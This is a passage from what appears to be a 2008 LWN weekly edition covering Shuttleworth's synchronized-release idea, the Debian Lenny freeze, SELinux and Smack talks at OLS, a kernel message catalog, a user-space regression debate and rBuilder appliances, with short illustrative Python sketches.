functionality, along the lines of KDE 4 or GNOME 3.0.  As an example, he
used a six month release cycle where every fourth or sixth was a major
release.  For a distribution, that might be a long-term support release,
rather than a major change.


One of the key requirements that Shuttleworth sees is the need to
"keep the trunk pristine", by doing integration on the trunk
and feature development on branches.  Along with this is the need for more
and better tests.  While not necessarily believing in test-driven
development, he certainly leans that way.  In any case, all the tests
should pass before committing to the trunk.


Many projects do not yet have an extensive test suite, but this needs to
change.  He quoted a Chinese proverb that "the best time to plant a
tree is 20 years ago, the second best time is today".  He mentioned
that he is working on a robot that controls the trunk of a development
tree. Developers will request it to merge from a branch, so the robot
merges the branch
and runs all the tests.  If the tests pass, it commits, otherwise it gets
kicked back to the developer.
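
The gatekeeping logic of such a robot is simple enough to sketch.  The following Python fragment is purely illustrative and is not Shuttleworth's tool: gated_merge(), the list-of-changes model of a branch, and the run_tests callback are all hypothetical.

```python
def gated_merge(trunk, branch, run_tests):
    """Trial-merge `branch` into `trunk` and commit only if the tests pass.

    `trunk` and `branch` are lists of change identifiers; `run_tests` is a
    callable that takes the merged list and returns True on success.
    Returns (new_trunk, accepted)."""
    candidate = trunk + [change for change in branch if change not in trunk]
    if run_tests(candidate):
        return candidate, True    # tests pass: the merge lands on the trunk
    return trunk, False           # tests fail: trunk is left untouched
```

The point of the design is that the trunk only ever moves from one passing state to another; a failing merge never becomes visible to other developers.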


He sees distributions as "an effective conduit of upstream to
users"; to that end, he believes that agreeing on versions of vital
infrastructure can only help.  Bugs that users find will be more likely to
be fixed; those versions will also get better testing which will help
developers.  It is a conversation that free software should be having
because it is a "very exciting idea" that won't work for every
project but should be attempted and experimented with.  


In answer to criticism about Ubuntu not contributing as much as other
distributions would in his proposed synchronized release, Shuttleworth was
adamant that it was not true.  He 
hates to see the antagonism and vitriol between distributions. "We
have much bigger fish to fry and they are probably not here today."


If all of the distributions were to standardize on a particular version of
some project for their next release, what happens if that project falls
behind?  There are risks associated with that, Shuttleworth admits, but if
it were happening, more resources would be available to help the project
catch up.  In the worst case, perhaps falling back to the previous version
would have to happen. "Being tightly coupled has risks."


This is clearly an idea that Shuttleworth feels strongly about, not
necessarily that it be adopted fully, but that it be discussed and
considered.  Certainly some of his ideas have a great deal of merit.  We
will have to wait and see whether the grander vision will ever be
implemented.


		Debian Lenny is frozen


The Debian project is gearing up for
the release of Debian Lenny, the next stable release of the Debian
GNU/Linux operating system.  This week we heard that Debian Lenny has been frozen.

What does the freeze mean and when can we expect Debian Lenny to be
released?  To answer the second question first, the release is currently expected in
September.  While the testing branch is very close to what Debian Lenny
will be, there are still Release Critical bugs to squash and other work
that must happen before Lenny is pronounced stable.  The Debian "lenny" Release
Information page gives some pointers to various progress pages where
you can find out more about the bugs that still need to be fixed.

Mostly what the freeze means is that there are no more automatic uploads
from Debian's unstable branch to the testing branch.  Most Debian packages
start out in unstable, also known as sid.  That gives people a chance to
test the packages and report any bugs.  Assuming that these packages are
working well, they will be automatically uploaded to the testing branch
after a certain amount of time.  Now though, testing is frozen, so a
release manager will need to evaluate each unstable package and manually
upload the package to testing, if it is judged suitable for Lenny.  Chapter
5.13.3 of the Debian Developer's Reference covers direct updates to testing, if
you are looking for more detailed information.

When Debian releases a stable distribution, the user can be assured that
they are getting a very stable operating system.  All the packages will
interact well with one another.  It will not be the most up-to-date system
available, because stability is considered more important than new versions
of packages.  Many Debian users agree.  Some will continue to run Etch, the
current stable version, until several months after Lenny is released.

If you want a stable system, but need just one or two more current
packages, you might consider building those packages yourself.  Backports.org is another way of getting a
few more current packages for your stable system.  AptPinning allows you to run
certain packages from one version, say unstable, on your stable system.
There will be some risk with each of these methods, as newer packages may
require newer libraries or have other dependencies.  The more you change
your stable system, the more instability you introduce.

The lenny package list will help you find out what packages are currently in Lenny.
Some digging through the sections there will show that
linux-image-2.6-486 (2.6.25+14), dpkg (1.14.20) and hal (0.5.11-2) are
among the Administration Utilities.  The Python section lists python
(2.5.2-1) among the many related packages.  To find out if Lenny has what
you are looking for, just browse through the sections.

		OLS: SELinux from academia to your desktop


One of the nice things about conferences is the ability to catch up on
where a particular project is headed, generally from one of the lead
developers.  Ottawa Linux Symposium did not disappoint in this area, with
several "State of ..." talks.  On day two of the four-day conference, James
Morris looked at SELinux from its academic roots to its plans for the
future.  


SELinux got its start from university research in the 80s and 90s that
recognized that Discretionary Access Control (DAC) did not protect very
well against the kinds of attacks that were becoming prevalent.  This
spawned the idea of Mandatory Access Control (MAC), in which the system
makes all of the policy decisions regarding access, so users cannot change
the permissions on files or other objects at their discretion.
SELinux is a MAC system.


Originally developed by the US National Security Agency (NSA) in the 90s,
SELinux was released under the GPL in December 2000.  At the Kernel Summit
in 2001, SELinux was proposed for inclusion in the 2.5 development-series
kernels (remember those?), but was rejected by Linus Torvalds because there
was no consensus amongst the various competing security models.  This is
what led to the creation of the Linux Security Modules (LSM) interface.


It was the LSM interface that got Morris involved in SELinux.  It took
until the 2.6 release in December 2003 before SELinux was available in the
mainline, which is about three years after its release.  This is "not
atypical for a significant change to the kernel," Morris said.


The next phase was to get it enabled and working in distributions.  Because
he works for Red Hat, Fedora (Core in those days) was an obvious choice.
FC2 was the first release with SELinux, but it was disabled by default
because the policy was too strict. "Every time we switched it on, we
would find bugs in the applications."  Security bugs that is.


So, Fedora came up with the idea of a "targeted" policy that only affected
network-facing services. This was released as part of FC3—which
formed the basis for Red Hat Enterprise Linux (RHEL) 4.  It was an attempt
to get SELinux "switched on and doing something useful".  It worked well enough that it
inspired confidence in the technology by proving it was viable.  SELinux
developers realized that "if we run into problems, we can fix
them". 


Since 2005, SELinux has emerged from a research orientation to a tool that
is usable—with a very active development community.  "Even
being part of the project, it's 
hard to follow all that goes on" in the SELinux community.  Morris
then outlined some of the more significant developments over the last few
years. 


The development of the reference policy by Tresys was a tremendous addition
to SELinux.  It was a "step forward in policy thinking"
because it provides a framework around which to design policy.  By getting
rid of the original "spaghetti code" policy, it "made policy much
more understandable to policy developers".


Loadable policy modules broke up the monolithic policy that was originally
part of SELinux into separate pieces.  Each can then be loaded individually
based on "policy booleans".  The two of these together allow policy to be
built and administered in sensible chunks, as well as allowing sites to
"customize policy to support local conditions".  Because of
library and toolchain improvements, you no longer have to dig through files
to edit, compile, and load policy either.  Many of the reputation problems that
SELinux has stem from the early days when it was well nigh impossible to
track down policy problems and fix them.


It is this frustrating user experience that SELinux is trying to tackle
these days.  The targeted policy is being merged with the "strict" policy
and hundreds of modules covering different applications have been added.
Policy failure—where the policy is written incorrectly causing a user to
be unable to do something they should be able to—is "something
you don't want the user to know about", but unfortunately that is
unworkable.  Because the system is under development, bugs will occur;
there is nothing more frustrating for a user than to be denied access but
to be unable to figure out why.


That is where setroubleshoot can help.  Inspired by GNOME's bug
buddy, it alerts the user to policy violations and tries to help find the
cause of the problem—to the point of suggesting possible fixes.  It
is somewhat dangerous, in that users may blindly follow the fixes without
understanding what they are doing, but it helps psychologically.
"Instead of a black box stopping your system from doing what you
wanted, now you have a transparent box."


System administrators have a much nicer set of tools to manage policies as
well as filesystem labels. audit2why can analyze SELinux output to
provide reasons, once again with possible fixes, for policy violations.  It
is "not the optimum way to develop policy," but it can help.
In addition, semanage is the "go to tool" for managing SELinux
and is becoming quite powerful.


Policy development has several GUI tools that have become available.  SLIDE
is an Eclipse plugin that assists in policy development.  It also includes
support for testing and deploying policies. Hitachi has developed
SEEdit, which is a tool that provides a simplified policy language
specifically targeted at embedded devices.  It is a higher-level language
that removes much of the complexity from SELinux policy while still
compiling into compatible policy files.


Performance and scalability have been two areas that have seen much work
over the past few years.  Many performance and memory reduction patches
have come from Japan, from the work on embedded SELinux.  On the performance critical path, RCU
has been used to eliminate some locking, while caching values rather than
recalculating them has also provided better performance.


One of the areas that the SELinux hackers are most excited about is threat
mitigation.  "We have seen evidence that SELinux has provided
protection for normal desktop users."  Tresys tracks these kinds
of threats in their SELinux Mitigation News.  In the final analysis,
this is what SELinux is meant to do, so it is gratifying to see concrete
results. 


SELinux has been adopted widely in Fedora and RHEL, but plans for the
future include making it available on other distributions.  Ubuntu is
shipping SELinux in addition to AppArmor, while Debian and Gentoo are
targeted for better SELinux support.  SELinux techniques are being pushed
beyond the kernel, into virtualization (XSM), the desktop (XACE), storage
(Labeled NFS), and applications like databases (SEPostgreSQL).  There is
also a push into other operating systems, like the OpenSolaris Flexible MAC
project. 


The challenges facing SELinux in the future are in areas like usability,
which is a "fundamental problem in security", and
documentation, which is "not very good, in some ways really
bad".  Morris also wants to keep the community of users and
developers growing.


While SELinux has had a difficult path—first in getting into the kernel at
all, then to becoming usable, and finally to actually preventing the kinds
of attacks it was designed to stop—the developers seem to overcome each
hurdle.  It is a complex beast, that in some ways defies analysis, but it
can help to protect systems.  Like it or hate it, it seems likely to be
with us for a long time.


		OLS: Smack for embedded devices


The Simplified Mandatory Access Control
Kernel (Smack) is a Linux access control mechanism akin to SELinux.  As
its name would imply, it is a much less complex scheme that requires far
fewer resources than SELinux, which may make it more palatable to
developers of embedded systems.  Smack developer Casey Schaufler gave a
talk at the recent Ottawa Linux Symposium (OLS) outlining how it could be used
for embedded devices.


Smack has the distinction of being the second user of the
Linux Security Module (LSM) kernel interface to be merged into the
mainline.  This finally put to rest the idea that the LSM might some day be
removed from the kernel, requiring all security solutions to be implemented
in terms of SELinux.  But Smack comes at Mandatory Access Control
(MAC)—which is at the heart of both SELinux and Smack—from a
different perspective.  Schaufler believes that MAC rules should be
explicitly specified rather than implicit in a set of policies a la SELinux.


In order to get everyone up to speed, Schaufler gave an overview of MAC and
Smack.  The main thing to remember about MAC is that it is not user
controlled.  The system makes all decisions about access and the attributes
of files that govern access.  The standard UNIX model, by way of comparison,
is a Discretionary Access Control (DAC) system, where users can change the
security attributes of objects under their control.


Smack relies on labels for subjects, which are active
entities, and objects which are passive.  An access is then an operation
that is performed by a subject, generally a task/process, on an object,
which is typically a file.  In order to determine whether the access
succeeds or fails, Smack compares the subject and object labels.  If they
match, access is granted; if they do not match, the explicit access rules
are consulted.  If one of those rules permits the attempted access, it is granted;
otherwise it is denied.
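
The decision procedure just described fits in a few lines.  This is a minimal Python sketch of the logic only, not the kernel implementation: smack_access() and the dictionary representation of the rule list are assumptions, and the special handling of the built-in system labels is deliberately left out.

```python
def smack_access(subject, obj, requested, rules):
    """Decide whether `subject` may perform `requested` on `obj`.

    `requested` is a string of access letters such as "r" or "rw".
    `rules` maps (subject_label, object_label) to the letters that an
    explicit rule grants.  System labels are not modeled here."""
    if subject == obj:
        return True                        # matching labels: always allowed
    granted = rules.get((subject, obj), "")
    # Every requested access letter must be covered by the explicit rule.
    return all(mode in granted for mode in requested)
```

With a single rule granting the hypothetical label Editor read and write access to Drafts, a call such as smack_access("Editor", "Drafts", "r", rules) succeeds while a request for execute access, or any access in the reverse direction, is denied.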


There are three system labels defined, along with access rules governing
their behavior, but all other rules must be explicitly added by the
administrator.   Labels are simply strings up to 23 characters long.  Rules
then specify a subject label, an object label, and a desired access (read,
write, execute, append).  After mounting a smackfs filesystem at
/smack, rules can be written to /smack/load, which stores
them in the kernel for immediate use.


It is important to note that objects inherit the label of the subject that
creates them.  That means that the label on an executable is only relevant
to determine whether the subject process is allowed to execute it.  The
process that gets created has the label of the subject that executed it,
not the label associated with the executable file. The same goes
for processes that create files: those files get the label of the process.
This is very different from the SELinux label inheritance rules.


There is more to it, of course, but not a lot more, which is what
makes it attractive to some.
Interested readers are directed to our article, Schaufler's
OLS paper [PDF], or the Smack home
page for more detailed looks at Smack.


Schaufler outlined specific reasons that a simplified system, like Smack,
would be attractive in the embedded world.  Many embedded devices are
single-purpose and geared towards one user.  Because cost is often a major
factor, the device only needs to implement the exact set of functions that
it is meant to provide.  As Schaufler puts it: "feature
completeness is uninteresting".


Cost often plays a role in the amount of system resources provided,
particularly RAM and flash, as well.  A solution that uses less memory fits
well with the embedded mindset.  There have been some efforts to pare down
SELinux and its enormous policy file for the embedded world (including a paper
at OLS [PDF], and a presentation at the Embedded Linux Conference that we covered briefly), but it is
still rather large.  It is also a great deal more complex than Smack, which
was a major thrust of Schaufler's presentation.


One problematic area for putting SELinux on embedded devices is that most
flash filesystems do not have support for extended attributes (xattrs).
Both Smack and SELinux use xattrs to store labels for files, but Smack can provide a
default label for an entire filesystem to avoid requiring xattr support.
Also, system files automatically default to the "_" (called floor) label so,
in many cases, labels on individual files may not be required.


In his talk, Schaufler gave several examples of specific sets of
applications and how they could be easily cordoned off from each other
while still working together.  The model he used was of a mobile phone with
multiple applications.  The phone's system data would have the default
floor label, which means that it can be read, but not written, by a
process with any label.


One of Schaufler's examples was of two different applications that
each retrieved content from the network to display to a user.  Each
retrieved headlines from different services, one from CNN, the other from
ESPN.  At times the content might overlap, in which case the phone vendor
wanted each to be able to read the other's data, potentially displaying a
sports story as part of the regular news or vice versa.  This is easily
handled by two Smack rules:


Assuming that the CNN application runs with the CNN label, and the ESPN
process with ESPN, they can each read and write their own private data
(because the labels match).  Because of the two rules above, they can also
read each other's private data.  If, at some point, the phone provider
decided that those two applications should not be able to share data, those
rules would simply need to be removed; no filesystem relabeling or anything
else is required.
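
The label-matching behavior described here can be modeled in a few lines of
Python.  This is a toy sketch, not Smack's implementation: the two rules are
reconstructed from the description above, smack_allows() and the rules table
are hypothetical names, and Smack's other special labels are left out.

```python
# Toy model of Smack access checks; names are illustrative only.
FLOOR = "_"  # default label carried by system files

# Explicit rules: (subject label, object label) -> permitted access letters.
rules = {
    ("CNN", "ESPN"): "r",
    ("ESPN", "CNN"): "r",
}

def smack_allows(subject, obj, access):
    """Return True if a process labeled `subject` may perform `access`
    ("r" or "w") on an object labeled `obj`."""
    if subject == obj:
        return True                      # matching labels: full access
    if obj == FLOOR and access == "r":
        return True                      # floor-labeled data is readable by all
    return access in rules.get((subject, obj), "")

print(smack_allows("CNN", "CNN", "w"))   # own data: True
print(smack_allows("CNN", "ESPN", "r"))  # shared read: True
print(smack_allows("CNN", "ESPN", "w"))  # no write rule: False

# Dropping the rules ends the sharing; no labels need to change.
rules.clear()
print(smack_allows("CNN", "ESPN", "r"))  # False
```

Note that revoking the sharing touches only the rule table; the labels on the
processes and their files stay as they were.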


Another example that Schaufler gave was of a video process and an audio
process that cooperated in sharing system resources by sending messages to
each other.  They had no need to share data, just to send UDP messages.  In
Smack, a process can send a UDP packet if it has write access to the label
of the other process.  So the following Smack rules could be used:


One might expect that giving write permission would allow Video, for
example, to write to data with the Audio label.  This is not the case
because UNIX file semantics require read access in 
order to write file data (because the inode of the file must be read).  So
under this set of rules, each process can send UDP packets to (and receive
them from) the other, but cannot access any of the data labeled for the
other process.
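
A toy model of this distinction, following the description above rather than
Smack's actual code: sending a datagram needs only write access to the
receiver's label, while writing file data needs both read and write access.
The rules are reconstructed from the text, and all function names are
hypothetical.

```python
# Toy model: write-only rules allow messaging but not file access.
rules = {
    ("Video", "Audio"): "w",
    ("Audio", "Video"): "w",
}

def has_access(subject, obj, wanted):
    """True if every access letter in `wanted` is granted to `subject`."""
    if subject == obj:
        return True
    granted = rules.get((subject, obj), "")
    return all(letter in granted for letter in wanted)

def can_send_udp(sender, receiver):
    # Delivering a packet counts as a write to the receiving process.
    return has_access(sender, receiver, "w")

def can_write_file(subject, file_label):
    # Per the article, writing file data also requires read access.
    return has_access(subject, file_label, "rw")

print(can_send_udp("Video", "Audio"))     # True
print(can_write_file("Video", "Audio"))   # False
```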


Schaufler had some other examples in his presentation (slides
[PDF]) that were geared more toward exploring Smack's capabilities than
toward embedded applications specifically.  He concluded by directly comparing
Smack and SELinux in terms of complexity.  Clearly Smack is vastly simpler;
whether it has enough capabilities to provide the protection that embedded
developers require remains to be seen.  On the other hand, whether SELinux
can be made to work reasonably in embedded environments is also an outstanding
question.  It will be interesting to watch.


		A kernel message catalog


Kernel developers will often use printk() to output a message when
something goes wrong.  Such messages tend to be helpful to kernel
developers; if nothing else, they can be used to find the place in the
source where the message is emitted, and that, in turn, is most useful for
somebody trying to figure out what the message is really saying.  So, if
your kernel tells you, for example, "lguest is afraid of being a guest," a
quick dig through the source turns up a comment reading "Lguest can't run
under Xen, VMI or itself.  It does Tricky Stuff."  Problem solved - or, at
least, understood.


But, for the bulk of Linux users and administrators, the act of
printk() interpretation by recourse to the kernel source is,
itself, Tricky Stuff.  If the kernel cannot tell them directly what the
problem is, they would much rather have a more straightforward means
of translating messages into some sort of useful English.


Or maybe not: for many Linux users, English may not be much more helpful
than straight kernel-speak.  It would be really nice to translate those
messages into some sort of useful French, or Chinese, etc.  What it comes
down to, in the end, is that printk() alone will never be able to
provide sufficient information to users in a way which can be understood
and used to solve problems.


Just over one year ago, LWN looked at some proposals for
adding structure to kernel messages.  After that, the discussion went
quiet, to the point that it seemed like not much was happening in the
messaging area.  But one should not forget that we are dealing with
companies like IBM which have been creating massive binders full of kernel
message documentation for several decades.  They're not going to give up so
easily.  So the posting (by Martin Schwidefsky) of a new
kernel messaging proposal is not an entirely surprising event.


In the latest scheme, each source file which generates structured messages
defines a macro KMSG_COMPONENT as a string naming the specific
subsection.  This name will often match the name of the module which is
created from that code, but that is not necessarily the case.  The name,
once chosen, is supposed to remain fixed forevermore; it becomes, in
essence, part of the user-space interface and should always match the
documentation.


Then, each message is assigned an integer identification number.  The
combination of the component name and the message number should be unique
throughout the kernel; it is used by various tools to associate the message
with a more detailed explanation of whatever it is intended to communicate.
The message number is used with one of a number of new
printk()-like functions:


The "_dev" versions take an additional struct device
argument (like dev_printk()) and encode the device name in the
resulting message.  That message (for all variants) will include the
component name and the message number in any output.  So, for example, the
S/390 "xpram" driver includes the following:


Should this particular error check trigger, the resulting message will look
like this:


Thus far, our user is probably not feeling much better informed than
before.  But there is additional information which is made available
and associated with that message tag.  In this particular case, it looks
like this:


Here, we have a more verbose description of the message.  Even more
helpfully (one hopes), there is a discussion of what can be done to make
this message go away.  This information can be provided within the source
or in a separate documentation file; it can also, presumably, be nicely
formatted and distributed to paying customers as a binder for the system
administrator's bookshelf.  It can be translated into other languages for
Linux users worldwide (and beyond: one could have a lot of fun with the
Klingon translation for this kind of material).
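
The tagging scheme can be illustrated with a small Python model.  It is only
a sketch: the "component.number" tag layout is an assumption based on the
description above, and the catalog entry, message text, and function names
are invented for illustration rather than taken from the patch.

```python
# Toy model of tagged kernel messages and a description catalog.
KMSG_COMPONENT = "xpram"   # component name, fixed once chosen

# Hypothetical catalog keyed by (component, message number).
catalog = {
    ("xpram", 1): {
        "description": "An invalid number of devices was requested.",
        "user_action": "Correct the module parameter and reload.",
    },
}

def kmsg(msg_id, fmt, *args):
    """Format a message prefixed with its component name and number."""
    return f"{KMSG_COMPONENT}.{msg_id}: {fmt % args}"

def explain(line):
    """Look up the catalog entry for a tagged message line, if any."""
    tag = line.split(":", 1)[0]
    component, _, number = tag.rpartition(".")
    return catalog.get((component, int(number)))

line = kmsg(1, "%d is not a valid number of devices", 42)
print(line)
print(explain(line)["user_action"])
```

Because the lookup key is the tag rather than the message text, the catalog
entry can be translated or reworded without touching the code that emits the
message.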


The patch includes a script (written in Perl with undocumented messages, of
course) which (when invoked with make D=1) will go through
the source and make sure that every kernel message has an associated
description block; it can also format the descriptions into man pages if
desired.  There are checks for missing descriptions or overloaded message
ID numbers; the script does not, at the moment, check for a change in the
message text.
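
The kind of consistency check performed by that script might look like the
following Python sketch.  It does not reproduce the Perl script's logic; the
input data structures and the check_catalog() name are hypothetical.

```python
from collections import Counter

def check_catalog(messages, descriptions):
    """Report problems in a message catalog.

    `messages` is a list of (component, number, text) tuples found in the
    source; `descriptions` is a set of (component, number) tags that have
    a description block.
    """
    problems = []
    uses = Counter((comp, num) for comp, num, _ in messages)
    for tag, count in sorted(uses.items()):
        if count > 1:
            problems.append(f"{tag[0]}.{tag[1]}: ID used {count} times")
        if tag not in descriptions:
            problems.append(f"{tag[0]}.{tag[1]}: missing description")
    return problems

found = [
    ("xpram", 1, "invalid device count"),
    ("xpram", 2, "out of memory"),
    ("xpram", 2, "unrelated message reusing an ID"),
]
print(check_catalog(found, {("xpram", 1)}))
```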


Martin's first posting made this work specific to the S/390 architecture;
following a suggestion from Andrew Morton,
he made it generic in later versions.  The cost of this work is zero for
those who do not use it, so there is a reasonable chance that it will find
its way into the mainline eventually.  Before the message catalog system can be truly
useful, though, developers will have to go through and document a
substantial portion of the messages created by the kernel - and keep that
documentation current as the kernel evolves.

		Can user-space bugs be kernel regressions?


Adding new functionality to the kernel while maintaining the interfaces for
user space is the standard kernel development practice.  Sometimes, though,
that can tickle bugs in user-space programs in unpleasant ways.  When that
happens, it is clearly a regression—something that worked before no
longer does—but is it a kernel regression?  In the end, it doesn't
matter, it seems, because the kernel needs to change to keep the user-space
program working, even at the expense of "ugliness".


Clearly, for purely internal kernel functionality, there is no
mandate for compatibility across kernel versions.  But, when the user-space
interface is involved, things get a bit trickier.  A change that
alters the way a documented interface works is essentially never done;
user-space interfaces are maintained forever.
When new functionality properly uses a documented interface, but breaks a
user-space program, the situation gets murkier.


That situation came up recently when Andrew Morton noticed that the linux-next tree broke the X
server on his laptop.  The breakage was quickly traced to a bug in
the Synaptics touchpad driver for X.  The length passed to an ioctl()
along with an array was given as the number of bits, rather than bytes, that
the array could hold.  Thus the maximum buffer length passed was too large
by a factor of eight.
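
The arithmetic behind that factor of eight is easy to check.  The sketch
below assumes a bitmap of 511 bits stored in 32-bit words, figures chosen to
match the 64-byte and 511-byte numbers quoted later in this article; the
variable names are illustrative.

```python
# Bits-versus-bytes confusion, worked through with assumed sizes.
BITS_NEEDED = 511        # assumed number of bits in the bitmap
WORD_BITS = 32           # assumed word size on a 32-bit system

words = -(-BITS_NEEDED // WORD_BITS)    # ceiling division: 16 words
actual_bytes = words * WORD_BITS // 8   # real size of the array: 64 bytes
claimed_bytes = BITS_NEEDED             # bug: bit count passed as byte length

print(actual_bytes, claimed_bytes)                 # 64 511
print(round(claimed_bytes / actual_bytes, 1))      # 8.0
```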

 
As a solution, Dmitry
Torokhov offered up a patch, not to kernel
code, but to the synaptics X driver.  That didn't sit
particularly well with Morton and others, eventually leading to a pronouncement from Linus Torvalds:

If somebody has the commit that broke user space, that commit will be 
_reverted_ unless it's fixed. It's that simple. The rules are: we don't 
knowingly break user space.


Torokhov clearly felt that it was the driver, not his changes, that was at
fault, which is entirely understandable because it's true.  That doesn't
alter the fact that new kernels would break existing, working
configurations on laptops everywhere.  The kernel change just made full use of an
existing, documented interface, as Torokhov explained:

It is not like we broke ABI here. The program (synaptics driver) had a
grave bug. Older kernels happened to paper over the bug because they
did not fill the whole buffer that was advertised as available. Now
that we have more data to report the bug bit us.


Declaring an array of 64 bytes while telling the kernel that it can store up to
511 bytes into it is obviously a bug.
But, as Morton points out:

It really really doesn't matter what the causes are or which piece of
code is at fault or anything else like that.

What _does_ matter is that people's stuff will break.  Apparently lots
of people's.  That's a problem.  A _practical_ problem.  Can we
pleeeeeeze be practical and find some way of preventing it?


Since the code was in linux-next, it was targeted at the 2.6.28 kernel.
In Torokhov's thinking, this would allow something approaching six months
for distributions to update the synaptics driver.  But that is a fundamental
misunderstanding of how and when kernels are upgraded—it is not only
by way of distributions.  Introducing a change like this would result in
many messages to linux-kernel from unhappy folks with broken X servers.


Kernel hackers purposely build and run kernels on a wide variety of
hardware and distributions.  That includes older distributions that no
longer get updates; those systems would be stuck with the buggy driver, and
thus a non-working X server, essentially
forever.  Obviously, they could rebuild the synaptics driver (kernel
hackers have been known to compile things other than kernels), but that
isn't the point.


There are major benefits to also having lots of regular users update their
kernels 
frequently.  Trying to ensure that there won't be any unnecessary barriers
to doing that can only help.  Torvalds describes it this way:

And if we want to encourage people to upgrade their kernel very 
aggressively (and we absolutely do!), then that means that we have to also 
make sure it doesn't require them upgrading anything else.


Torvalds and Torokhov worked out a fix that preserved the old behavior for
a specific passed-in buffer length, while allowing the new events to be
delivered to any other users of the ioctl() that passed in the
proper length.  Torvalds commented:
"Yeah, it's not pretty, but pragmatism before beauty." 

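The shape of such a compatibility shim can be sketched as follows.  This is a
Python illustration of the idea only, not the kernel code: the constants and
the fill_buffer() function are hypothetical, with sizes borrowed from the
figures quoted earlier.

```python
# Sketch of a "quirk" that preserves old behavior for one known-bad caller.
LEGACY_CLAIMED_LEN = 511   # length the buggy driver passes (assumed)
LEGACY_SAFE_LEN = 64       # bytes older kernels actually filled (assumed)

def fill_buffer(data, claimed_len):
    """Return the bytes the kernel would copy out for a given request."""
    if claimed_len == LEGACY_CLAIMED_LEN:
        # Known-buggy request: never write more than old kernels did.
        limit = LEGACY_SAFE_LEN
    else:
        limit = claimed_len
    return data[:limit]

events = bytes(96)                       # 96 bytes of data to report
print(len(fill_buffer(events, 511)))     # 64: legacy caller is protected
print(len(fill_buffer(events, 96)))      # 96: correct callers get everything
```

The cost of this approach is visible even in the sketch: one magic length is
treated specially forever, whether or not the caller is actually the buggy
driver.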

It is, to some extent, a gray area.  Regressions are bad for any number of
reasons, but maintaining hackarounds for buggy user-space programs has its own
set of problems.  The hope is that eventually the need for the workaround
goes away so that it can be removed.  It would seem difficult to determine
when the last user of the old synaptics driver finally upgrades, so this
code could be with us for a long time.  Given the alternative, the
price seems worth it.


Though Torvalds was absolute in condemning any known regression,
even for programs that are clearly misusing an interface, there must be a
line somewhere.  If some obscure program, with few users, gets broken by
the kernel doing something documented and reasonable, it is hard to imagine
that this kind of workaround will be required.  This particular problem was
relatively easy to decide; the next might not be.


		Building custom appliance distributions with rBuilder


Linux distributions can be a pain.  Users have to go through the whole
process of installation, configuration, and updates, and, often, all they
really want to do is to run a single application.  The vendors of that
application, meanwhile, feel the need to support as many distributions as
possible, even though the actual system running underneath their code is
nearly irrelevant.  Wouldn't it be nice if users could simply get their
desired application as an "appliance" which comes with all the necessary
component parts nicely hidden inside?


As it happens, rPath has been in the appliance business for a little while
now.  Recently, the company has made its appliance-building infrastructure
available to free-software products in the form of rBuilder Online.  In essence,
rBuilder can be used to create and maintain a custom distribution oriented
around the delivery of a specific application.  The result is a
"software appliance" which, in theory, makes the given application
available in a self-contained, standalone distribution.


There are a number of example appliances available on the site.  They
include:


 Bongo, an attempt to
     revitalize work on the Hula mail and calendar server

 Gallery, a standalone photo
     album

 LochDNS, a DNS
     server

 Openfiler, a storage
     management system


There are several others oriented around content
management systems, telephony applications, database servers, and more.
All told, quite a few projects have shown interest in creating software
appliances for their applications.


Your editor grabbed a copy of the Openfiler appliance and installed it onto
a spare box which had been cluttering up the office.  Appliances from
rBuilder start out looking like a Fedora system; they use the same Anaconda
installer.  The installed system also shows a lot of Red Hat heritage, such
as /etc/sysconfig, various system-config-* commands, an
/etc/inittab file which credits Mark Ewing and Donnie Barnes,
etc.  But there is a crucial difference: there is no rpm command.  Instead,
these appliances are based on rPath's Conary package management
system, which takes a very different approach to the software management
problem.  But there are still similarities with Fedora: your editor
attempted a conary updateall operation on 
the LochDNS appliance, only to see it fail with a set of file conflict
errors; it was almost like running Rawhide again.

 
Appliance users are not supposed to have to dirty their fingertips with
command-line administrative operations, though.  To help them avoid this
fate, rBuilder-based appliances come with the rPath
Appliance Platform Agent, otherwise known as a web-based administration
interface.  Once the user gets past the usual set of obnoxious Firefox
dialogs ("this site has an SSL certificate which is not only unknown, but
is almost 
certainly hostile and is ugly besides"), this interface provides a
set of administrative screens for standard tasks (networking, updating the
system, etc.) along with some specific to the Openfiler application.  


In theory, it should be possible to manage one of the appliances without
ever going to the command line - or even knowing that the command line
exists.  In practice, how well that works depends a lot on how the
administration screens are designed.  In the Openfiler case, quite a bit of
clicking around in circles was required, but your editor did finally
succeed in setting up a volume based on a USB key, performing a software
update, and shutting down the system at the end.


The creation of appliances would appear to be relatively straightforward;
details can be found in this
document.  One creates an account in the rBuilder system, then puts
together a file describing which components (packages) are necessary in the
final system.  Those components will presumably include at least one
application provided by the appliance builder - that application being the
reason for the creation of the software appliance in the first place.  The
"rMake" system will then pull all of the pieces together, bring in any
needed dependencies, and wrap it all up inside a 
minimal distribution; the resulting system image seems to run at about 300MB.


There are several possible output formats, including the Anaconda-based
installation CD image; the rPath folks would appear to have put a lot of
effort into making appliances work on a number of virtualization platforms
as well.  Appliances can be built for VMware, various forms of Xen,
Virtual Iron, and Microsoft VHD.  Notably absent is anything based on Lguest
or KVM.  Even more notably absent is any kind of live CD appliance;
anything not running in a virtual machine must be installed onto the host
system's disks.


rPath's Conary servers seem to be set up to handle software updates.  It is
also possible to obtain source for the packages found in an appliance
through the rBuilder site, though one must do a little digging first.
Both of these features are important: anybody creating a distribution-based
appliance has to arrange for updates and source availability somehow.  One
assumes that most appliance creators have no real desire to get into the
broader distribution business, so it's nice for them to be able to offload
these tasks.  Anybody distributing these appliance images should note that
rPath does not appear to have undertaken any obligation to continue to
provide these services in the future.  Should rPath decide to stop, some
interesting questions on who is ultimately responsible for satisfying the
source-availability provisions of the GPL could come up.


Naturally enough, rPath offers commercial services for those who would like
stronger guarantees about long-term support, or who want to include
proprietary software in their appliances.


For the time being, this approach to software distribution would seem to be
most useful for companies which are in the business of building real,
hardware-based appliances.  Distributing software in virtual machines has
the look of a new and truly impressive form of bloat; even "just enough
operating system" is a lot of baggage for an application to drag around.
For situations where one wants to try out a complex system, appliance
distribution may be worth its cost, but one would probably not want to get
every application this way.


There may be value, though, in software distributions which can run almost
anywhere, and which can be nicely isolated from the outside world.  Locking
network-exposed applications - server processes or web browsers - into
their own little world could help to avoid a lot of security problems in a
way which seems more straightforward than SELinux or containers.


But, perhaps most interestingly, the appliance approach could eliminate a
number of distribution-compatibility issues by putting many more people
into the distribution business.  Now anybody can throw together a
special-purpose distribution without having to deal with all of the
plumbing that makes the whole thing actually work.  Something interesting
will certainly come of this idea, even if it's hard to say just what that
might be at the moment.

		The TALPA molehill


The TALPA malware scanning API was covered here in December, 2007.
Several months later, TALPA is back - in the form of a patch set posted by a Red Hat
